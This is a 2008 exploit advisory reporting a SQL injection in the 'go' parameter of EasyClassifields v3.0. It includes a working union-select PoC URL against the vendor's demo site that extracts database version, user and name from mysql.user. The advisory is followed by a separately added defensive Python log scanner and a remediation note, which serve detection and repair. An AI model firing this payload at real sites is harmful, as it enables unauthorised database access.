##############EasyClassifields v3.0 SQL Injection#######################

####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: Luigi,suN8Hclf,str0ke
In the wild...

##################################################################

###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:

http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>

PoC on demo site:

http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user

# milw0rm.com [2008-09-01]
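
Added example (not part of the original advisory, and not the vendor's code): a log check a defender can run over web server access logs to find requests that reach index.php with page=browse and a "go" value that is not a plain integer, as in the PoC above. It assumes combined log format and that legitimate "go" values are non-negative integers; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation addresses.
# The second line carries the "go" value from the advisory's PoC.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Sep/2008:10:00:01 +0000] "GET /path/index.php?PageSection=0&page=browse&go=12 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Sep/2008:10:00:05 +0000] "GET /path/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user HTTP/1.1" 200 734
198.51.100.23 - - [01/Sep/2008:10:00:40 +0000] "GET /path/index.php?PageSection=0&page=browse&go=latest HTTP/1.1" 200 4100
198.51.100.4 - - [01/Sep/2008:10:01:00 +0000] "GET /path/index.php?PageSection=0&page=contact HTTP/1.1" 200 2048
"""

# client IP, then the request target from the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL words that have no business in a numeric parameter
SQL_TOKENS_RE = re.compile(r"\b(union|select|concat|from)\b", re.IGNORECASE)


def suspicious_go_requests(log_text):
    """Return (client_ip, reason, decoded_go) for browse requests with a bad `go` value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client_ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs URL-decodes values, so %20 becomes a space before matching
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page") != ["browse"]:
            continue
        for value in params.get("go", []):
            # Assumption: legitimate values are plain non-negative integers.
            if value.isascii() and value.isdigit():
                continue
            reason = "sql-tokens" if SQL_TOKENS_RE.search(value) else "non-numeric"
            findings.append((client_ip, reason, value))
    return findings


if __name__ == "__main__":
    for ip, reason, value in suspicious_go_requests(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value}")
```

The same integer-only rule, enforced in the application before the value reaches the query (or a bound parameter in a prepared statement), is the fix for the flaw itself; the log check only shows who has been sending such requests.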
EasyClassifields 3.0 go Remote SQL Injection Vulnerability
e.wiZz!
09/01/2008